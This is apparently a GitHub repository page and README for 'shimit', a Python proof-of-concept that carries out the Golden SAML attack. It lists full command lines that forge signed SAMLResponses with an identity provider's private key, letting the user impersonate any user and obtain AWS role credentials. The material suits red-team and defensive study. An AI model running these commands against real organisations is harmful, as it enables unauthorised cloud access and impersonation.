A tool that implements the Golden SAML attack
Switch branches/tags
Nothing to show
Clone or download
Latest commit 49ad4ce Nov 21, 2017
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE Initial commit Nov 7, 2017
README.md Link Update Nov 21, 2017
aws.py Initial Commit Nov 21, 2017
service_provider.py Initial Commit Nov 21, 2017
shimit.py Initial Commit Nov 21, 2017

README.md

shimit

shimit is a python tool that implements the Golden SAML attack. More informations on this can be found in the following article on our blog.

python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]
                 
              ██╗   ███████╗██╗  ██╗██╗███╗   ███╗██╗████████╗     ██╗ ██╗  
             ██╔╝   ██╔════╝██║  ██║██║████╗ ████║██║╚══██╔══╝    ██╔╝ ╚██╗ 
            ██╔╝    ███████╗███████║██║██╔████╔██║██║   ██║      ██╔╝   ╚██╗
            ╚██╗    ╚════██║██╔══██║██║██║╚██╔╝██║██║   ██║     ██╔╝    ██╔╝
             ╚██╗   ███████║██║  ██║██║██║ ╚═╝ ██║██║   ██║    ██╔╝    ██╔╝ 
              ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝    ╚═╝     ╚═╝  

Overview

In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application.

shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...

AWS

After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using the golden SAML.

Requirements:

For installing the required modules, run the following command:

python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli

Needs to be installed in order to use the credentials obtained. Can be downloaded for Windows or Linux from these links.

Usage:

Apply session for AWS cli

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust

pk - Private key file full path (pem format)

c - Certificate file full path (pem format)

u - User and domain name e.g. domain\username (use \ or quotes in *nix)

n - Session name in AWS

r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.

id - AWS account id e.g. 123456789012

Save SAMLResponse to file

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file

python .\shimit.py -l saml_response.xml

l - Load SAMLResponse from a specified file path

Contributions

shimit supports AWS as a service provider at the moment, as a POC. We highly encourage you to conribute with a new modules for other service providers.